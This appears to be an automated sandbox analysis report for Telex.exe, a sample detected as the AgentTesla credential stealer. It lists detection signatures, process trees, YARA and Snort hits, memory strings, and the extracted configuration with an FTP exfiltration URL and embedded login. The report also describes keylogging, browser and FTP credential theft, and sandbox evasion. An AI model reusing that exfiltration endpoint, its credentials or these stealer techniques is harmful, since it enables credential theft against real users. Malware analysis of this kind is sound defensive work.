Play interactive tour

Edit tour

Analysis Report Telex.exe

Overview

General Information

Sample Name:	Telex.exe
Analysis ID:	412652
MD5:	01fe9288b37bdeb3684db4bd497685e2
SHA1:	083282559e805cef41f6c869d12bca814b72dcd6
SHA256:	ec9c7eceabe73740fefb573d42bc06a3c7e65173f2c7c3030cbb50edd8e3ba17
Tags:	AgentTeslaexe
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains very large array initializations

Contains functionality to register a low level keyboard hook

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

Telex.exe (PID: 6352 cmdline: 'C:\Users\user\Desktop\Telex.exe' MD5: 01FE9288B37BDEB3684DB4BD497685E2)

Telex.exe (PID: 6424 cmdline: C:\Users\user\Desktop\Telex.exe MD5: 01FE9288B37BDEB3684DB4BD497685E2)

mDPTQJF1.exe (PID: 4652 cmdline: 'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe' MD5: 01FE9288B37BDEB3684DB4BD497685E2)

mDPTQJF1.exe (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe MD5: 01FE9288B37BDEB3684DB4BD497685E2)

mDPTQJF1.exe (PID: 4724 cmdline: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe MD5: 01FE9288B37BDEB3684DB4BD497685E2)

mDPTQJF1.exe (PID: 5920 cmdline: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe MD5: 01FE9288B37BDEB3684DB4BD497685E2)

mDPTQJF1.exe (PID: 852 cmdline: 'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe' MD5: 01FE9288B37BDEB3684DB4BD497685E2)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.universalinks.net/bring4@universalinks.net{lafa{u^wEx8"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000001.00000002.502933000.0000000002C03000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Telex.exe PID: 6424	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Telex.exe PID: 6424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Telex.exe PID: 6352	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Telex.exe PID: 6352	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: mDPTQJF1.exe PID: 5920	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mDPTQJF1.exe PID: 5920	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mDPTQJF1.exe PID: 4652	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mDPTQJF1.exe PID: 4652	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author
18.2.mDPTQJF1.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
18.2.mDPTQJF1.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
15.2.mDPTQJF1.exe.376ab38.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
15.2.mDPTQJF1.exe.376ab38.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
1.2.Telex.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.Telex.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Telex.exe.391ab38.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Telex.exe.391ab38.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
15.2.mDPTQJF1.exe.376ab38.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
15.2.mDPTQJF1.exe.376ab38.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.Telex.exe.391ab38.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Telex.exe.391ab38.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.universalinks.net/bring4@universalinks.net{lafa{u^wEx8"}

Multi AV Scanner detection for domain / URL

Show sources

Source: ftp.universalinks.net

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe

ReversingLabs: Detection: 25%

Multi AV Scanner detection for submitted file

Show sources

Source: Telex.exe	Virustotal: Detection: 26%			Perma Link
Source: Telex.exe	ReversingLabs: Detection: 27%

Source: 18.2.mDPTQJF1.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 1.2.Telex.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8

Source: Telex.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Telex.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Telex.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_02676148
Source: C:\Users\user\Desktop\Telex.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_02676138
Source: C:\Users\user\Desktop\Telex.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_026761FC
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	15_2_024F6268
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	15_2_024F6258

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49728 -> 192.145.239.54:21
Source: Traffic	Snort IDS: 2029928 ET TROJAN AgentTesla HTML System Info Report Exfil via FTP 192.168.2.5:49729 -> 192.145.239.54:31991

Source: Joe Sandbox View

IP Address: 192.145.239.54 192.145.239.54

Source: Joe Sandbox View

ASN Name: IMH-WESTUS IMH-WESTUS

Source: unknown

FTP traffic detected: 192.145.239.54:21 -> 192.168.2.5:49728 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 30 minutes of inactivity.

Source: unknown

DNS traffic detected: queries for: ftp.universalinks.net

Source: mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	String found in binary or memory: ftp://ftp.universalinks.net/bring4
Source: Telex.exe, 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	String found in binary or memory: http://FvPNfC.com
Source: Telex.exe, 00000001.00000002.503353247.0000000002C70000.00000004.00000001.sdmp	String found in binary or memory: http://ftp.universalinks.net
Source: Telex.exe, 00000000.00000002.238539164.0000000002861000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.503249049.0000000002C62000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321163435.00000000026B1000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000014.00000002.327822019.0000000002FC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Telex.exe, 00000001.00000002.502741768.0000000002BCA000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: Telex.exe, 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.503249049.0000000002C62000.00000004.00000001.sdmp	String found in binary or memory: https://srFPkrrHbWMI0Yhx6.net
Source: Telex.exe, 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://srFPkrrHbWMI0Yhx6.netX
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: Telex.exe, 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: Telex.exe, 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\Telex.exe

Code function: 1_2_010EAD70 SetWindowsHookExW 0000000D,00000000,?,?

1_2_010EAD70

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\Telex.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Telex.exe

Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 1.2.Telex.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6D16F24Au002d34D3u002d436Bu002dA9E5u002dCE5547824881u007d/u003596D1532u002dAAFEu002d4C3Fu002d9395u002d56D45A2D13D3.cs

Large array initialization: .cctor: array initializer size 12079

Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E9B14C	0_2_00E9B14C
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E9C2B0	0_2_00E9C2B0
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E9B140	0_2_00E9B140
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E999D8	0_2_00E999D8
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_00E9DF71	0_2_00E9DF71
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02676948	0_2_02676948
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02673A28	0_2_02673A28
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02673A38	0_2_02673A38
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02670040	0_2_02670040
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_0267405E	0_2_0267405E
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02670006	0_2_02670006
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02673819	0_2_02673819
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02673E00	0_2_02673E00
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02673E10	0_2_02673E10
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02673FF6	0_2_02673FF6
Source: C:\Users\user\Desktop\Telex.exe	Code function: 0_2_02673FAA	0_2_02673FAA
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_009D096C	1_2_009D096C
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_009DDAB8	1_2_009DDAB8
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_009D6BD0	1_2_009D6BD0
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010E4988	1_2_010E4988
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010E0040	1_2_010E0040
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010E6240	1_2_010E6240
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010ECC08	1_2_010ECC08
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010E8F48	1_2_010E8F48
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010E1ED8	1_2_010E1ED8
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010E0028	1_2_010E0028
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_010E3D10	1_2_010E3D10
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_02A14940	1_2_02A14940
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_02A1E160	1_2_02A1E160
Source: C:\Users\user\Desktop\Telex.exe	Code function: 1_2_02A14932	1_2_02A14932
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_00BCC508	15_2_00BCC508
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_00BC99D8	15_2_00BC99D8
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F6A68	15_2_024F6A68
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F0040	15_2_024F0040
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F405E	15_2_024F405E
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F0006	15_2_024F0006
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F3A28	15_2_024F3A28
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F3A38	15_2_024F3A38
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F382A	15_2_024F382A
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F3E00	15_2_024F3E00
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F3E10	15_2_024F3E10
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F3FF6	15_2_024F3FF6
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_024F3FAA	15_2_024F3FAA
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_04C07048	15_2_04C07048
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_04C0DAB0	15_2_04C0DAB0
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_04C0B760	15_2_04C0B760
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_04C0B770	15_2_04C0B770
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_04C07039	15_2_04C07039
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Code function: 15_2_00145C64	15_2_00145C64

Source: Telex.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mDPTQJF1.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Telex.exe, 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamexNhKxszWtvJQEBMekJEP.exe4 vs Telex.exe
Source: Telex.exe, 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs Telex.exe
Source: Telex.exe, 00000000.00000002.238539164.0000000002861000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs Telex.exe
Source: Telex.exe, 00000000.00000000.229350759.0000000000500000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameInvalidFilterCriteriaException.exeP vs Telex.exe
Source: Telex.exe, 00000001.00000002.497491335.00000000008A0000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameInvalidFilterCriteriaException.exeP vs Telex.exe
Source: Telex.exe, 00000001.00000002.500469927.0000000000FD0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Telex.exe
Source: Telex.exe, 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamexNhKxszWtvJQEBMekJEP.exe4 vs Telex.exe
Source: Telex.exe, 00000001.00000002.498218591.0000000000CF8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Telex.exe
Source: Telex.exe, 00000001.00000002.501300188.00000000010D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx vs Telex.exe
Source: Telex.exe, 00000001.00000002.501520800.0000000001170000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx.mui vs Telex.exe
Source: Telex.exe	Binary or memory string: OriginalFilenameInvalidFilterCriteriaException.exeP vs Telex.exe

Source: Telex.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Telex.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: mDPTQJF1.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 1.2.Telex.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.Telex.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/5@1/1

Source: C:\Users\user\Desktop\Telex.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Telex.exe.log

Jump to behavior

Source: Telex.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Telex.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Telex.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Telex.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: Telex.exe	Virustotal: Detection: 26%
Source: Telex.exe	ReversingLabs: Detection: 27%

Source: Telex.exe	String found in binary or memory: ^(Male\|Female)$-Add Student Details :-
Source: Telex.exe	String found in binary or memory: Teacher Name-Add Teacher Details :-

Source: C:\Users\user\Desktop\Telex.exe

File read: C:\Users\user\Desktop\Telex.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Telex.exe 'C:\Users\user\Desktop\Telex.exe'
Source: C:\Users\user\Desktop\Telex.exe	Process created: C:\Users\user\Desktop\Telex.exe C:\Users\user\Desktop\Telex.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe 'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe'
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
